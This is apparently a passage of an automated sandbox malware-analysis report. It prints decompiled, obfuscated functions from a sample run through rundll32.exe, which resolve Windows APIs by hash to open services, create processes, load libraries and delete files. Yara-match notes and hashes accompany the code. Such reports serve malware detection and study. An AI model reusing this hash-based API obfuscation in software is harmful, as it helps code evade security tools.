                                                      C-Code - Quality: 52%
                                                      			E006CF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E006D07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                                      0x006cf662
                                                      0x006cf663
                                                      0x006cf665
                                                      0x006cf668
                                                      0x006cf66a
                                                      0x006cf66d
                                                      0x006cf670
                                                      0x006cf673
                                                      0x006cf677
                                                      0x006cf678
                                                      0x006cf67d
                                                      0x006cf687
                                                      0x006cf693
                                                      0x006cf69a
                                                      0x006cf6a1
                                                      0x006cf6a5
                                                      0x006cf6a9
                                                      0x006cf6b0
                                                      0x006cf6c9
                                                      0x006cf6d8
                                                      0x006cf6de

                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 006CF6D8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: e5ce28f777ee97fcbb0f40c328e02666741496e654b79fdf1bfef53b5c485528
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: 2201E5B6901208BBEF059F94DD0A8DF7F75EB05324F148188F90466250D6B25E21DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006CB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E006CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E006C602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E006D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                                      0x006cb6f3
                                                      0x006cb6f8
                                                      0x006cb702
                                                      0x006cb70b
                                                      0x006cb712
                                                      0x006cb719
                                                      0x006cb720
                                                      0x006cb727
                                                      0x006cb72e
                                                      0x006cb747
                                                      0x006cb759
                                                      0x006cb75e

                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006CB759
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: b12ae957d101f7aa69163a32ec028809930ad8a978d3accd7e31397482b4cded
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: A6014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA0966190D3B15E209B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006DAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E006DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E006D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                                      0x006daa3f
                                                      0x006daa40
                                                      0x006daa41
                                                      0x006daa44
                                                      0x006daa47
                                                      0x006daa4b
                                                      0x006daa4c
                                                      0x006daa51
                                                      0x006daa5b
                                                      0x006daa64
                                                      0x006daa68
                                                      0x006daa6f
                                                      0x006daa76
                                                      0x006daa8d
                                                      0x006daa90
                                                      0x006daa9d
                                                      0x006daaa8
                                                      0x006daaad

                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 006DAAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: 663a755dfc6d45a7fbd065eb061e0d929363b67b5f9ec4174fd994159a9be1ad
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: 46F0F6B590020CFFDB08DF94D94A99EBBB5EB45304F10819CF915A6250D2B69B549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006C5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E006C5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E006D07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                                      0x006c5fb5
                                                      0x006c5fb6
                                                      0x006c5fb7
                                                      0x006c5fbb
                                                      0x006c5fbc
                                                      0x006c5fc1
                                                      0x006c5fcb
                                                      0x006c5fd7
                                                      0x006c5fde
                                                      0x006c5fe5
                                                      0x006c5ffc
                                                      0x006c5fff
                                                      0x006c6006
                                                      0x006c600d
                                                      0x006c601a
                                                      0x006c6025
                                                      0x006c602a

                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 006C6025
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: cb0861d6890d54ac7204ff8d6eb82e3182e3e738c333d00b41e92a2462ccbc2b
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: CCF04FB0D11208FFEB48DFA0E94689EBFB9EB40300F20819CE409A7260E7B19F159F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: rundll32.exe PID: 2408 Parent PID: 2856 rundll32.exeCOMMON

                                                      Executed Functions

                                                      Function 001E2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E001E2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001E602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001F07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                                      0x001e295f
                                                      0x001e2964
                                                      0x001e2967
                                                      0x001e296a
                                                      0x001e296d
                                                      0x001e296e
                                                      0x001e296f
                                                      0x001e2977
                                                      0x001e2985
                                                      0x001e298a
                                                      0x001e2992
                                                      0x001e299a
                                                      0x001e29a2
                                                      0x001e29a9
                                                      0x001e29b0
                                                      0x001e29b7
                                                      0x001e29bb
                                                      0x001e29cf
                                                      0x001e29dc
                                                      0x001e29e2

                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001E29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: f29e54dee73b85a96df9d17acf58ceeec97b552066db9f924e08f68ae3473b75
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: 19018072A00108BFEB14DF95DC0A8DFBFB6EF48750F108088F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001EC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001EC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001E602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001F07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                                      0x001ec6e1
                                                      0x001ec6e6
                                                      0x001ec6f0
                                                      0x001ec6fc
                                                      0x001ec703
                                                      0x001ec706
                                                      0x001ec70d
                                                      0x001ec711
                                                      0x001ec715
                                                      0x001ec71c
                                                      0x001ec723
                                                      0x001ec72a
                                                      0x001ec731
                                                      0x001ec738
                                                      0x001ec751
                                                      0x001ec762
                                                      0x001ec768

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001EC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 6944b5eda7ddc599a285dfadfb83d98871e35aac18c3631d2d2e62f16343f5b4
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: DC1133B290122DBBCB25DF95DC498EFBFB8EF14754F108188F90962220D3714B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E001E1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001E602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001F07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                                      0x001e1006
                                                      0x001e1009
                                                      0x001e100c
                                                      0x001e1011
                                                      0x001e1016
                                                      0x001e101d
                                                      0x001e1026
                                                      0x001e102d
                                                      0x001e1034
                                                      0x001e103b
                                                      0x001e1047
                                                      0x001e104f
                                                      0x001e1057
                                                      0x001e105e
                                                      0x001e1065
                                                      0x001e106c
                                                      0x001e1073
                                                      0x001e1077
                                                      0x001e108b
                                                      0x001e1096
                                                      0x001e109b

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 001E1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: e6c4d22095a37846949824c43428ebcba9464efa8f5f78c7bbe982629098abf5
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: 96015BB6D0170CBBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E001E4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001F07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                                      0x001e485e
                                                      0x001e487a
                                                      0x001e487d
                                                      0x001e4884
                                                      0x001e488b
                                                      0x001e4892
                                                      0x001e489d
                                                      0x001e48a0
                                                      0x001e48ad
                                                      0x001e48b7

                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 001E48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: db10be173d78d936ff7409dc4a61335d5f4ce6dd59e8ceb58d4ae770844ed64b
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 6FF0F4B0A05209BBDB04CFE8CA5699EBFB9AB40301F208188E444A7290E3B15F509A50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001F4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E001F4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001F07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                                      0x001f4f80
                                                      0x001f4f81
                                                      0x001f4f82
                                                      0x001f4f86
                                                      0x001f4f87
                                                      0x001f4f8c
                                                      0x001f4fa5
                                                      0x001f4fa8
                                                      0x001f4faf
                                                      0x001f4fb6
                                                      0x001f4fc7
                                                      0x001f4fca
                                                      0x001f4fd7
                                                      0x001f4fe2
                                                      0x001f4fe7

                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 001F4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: 3a5fbf3e33bfcad55dc1fab4b82b1efc569f49ed361eebb7fe294ba9cd13fcc4
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 50F037B081120CFFDB04EFA4D94289EBFBAEB44340F208299E804AB261D3715B509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001F976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 21%
                                                      			E001F976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001E602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001F07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                                      0x001f9772
                                                      0x001f9773
                                                      0x001f9778
                                                      0x001f977a
                                                      0x001f977b
                                                      0x001f977e
                                                      0x001f977f
                                                      0x001f9782
                                                      0x001f9785
                                                      0x001f9788
                                                      0x001f9789
                                                      0x001f978c
                                                      0x001f978f
                                                      0x001f9790
                                                      0x001f9791
                                                      0x001f9794
                                                      0x001f9797
                                                      0x001f979a
                                                      0x001f979d
                                                      0x001f97a0
                                                      0x001f97a3
                                                      0x001f97a6
                                                      0x001f97a7
                                                      0x001f97a8
                                                      0x001f97ad
                                                      0x001f97b7
                                                      0x001f97c3
                                                      0x001f97ca
                                                      0x001f97d1
                                                      0x001f97d8
                                                      0x001f97df
                                                      0x001f97e3
                                                      0x001f97fc
                                                      0x001f9816
                                                      0x001f981d

                                                      APIs
                                                      • CreateProcessW.KERNEL32(001E591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001E591A), ref: 001F9816
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: 86c2c147634ef3138d853ec8a87c4843de297417a20e506b2cc7360b5490e1f8
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: 1D11B372901188BBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001EB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 31%
                                                      			E001EB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001E602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001F07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                                      0x001eb569
                                                      0x001eb56a
                                                      0x001eb56d
                                                      0x001eb572
                                                      0x001eb574
                                                      0x001eb577
                                                      0x001eb57a
                                                      0x001eb57d
                                                      0x001eb580
                                                      0x001eb583
                                                      0x001eb586
                                                      0x001eb587
                                                      0x001eb58a
                                                      0x001eb58d
                                                      0x001eb590
                                                      0x001eb593
                                                      0x001eb594
                                                      0x001eb595
                                                      0x001eb59a
                                                      0x001eb5a4
                                                      0x001eb5b8
                                                      0x001eb5c0
                                                      0x001eb5c4
                                                      0x001eb5cb
                                                      0x001eb5d2
                                                      0x001eb5d9
                                                      0x001eb5e6
                                                      0x001eb5fd
                                                      0x001eb604

                                                      APIs
                                                      • CreateFileW.KERNELBASE(001F0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001F0668,?,?,?,?), ref: 001EB5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 64c03b7127ba3bee54388474f9df1fc94ff169f200a39c6328bbd3ed7b90b682
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 2A11C372801248BBDF16DF95DD06CEE7F7AFF99714F148198FA1862120D3729A60EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001F981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E001F981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001E602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
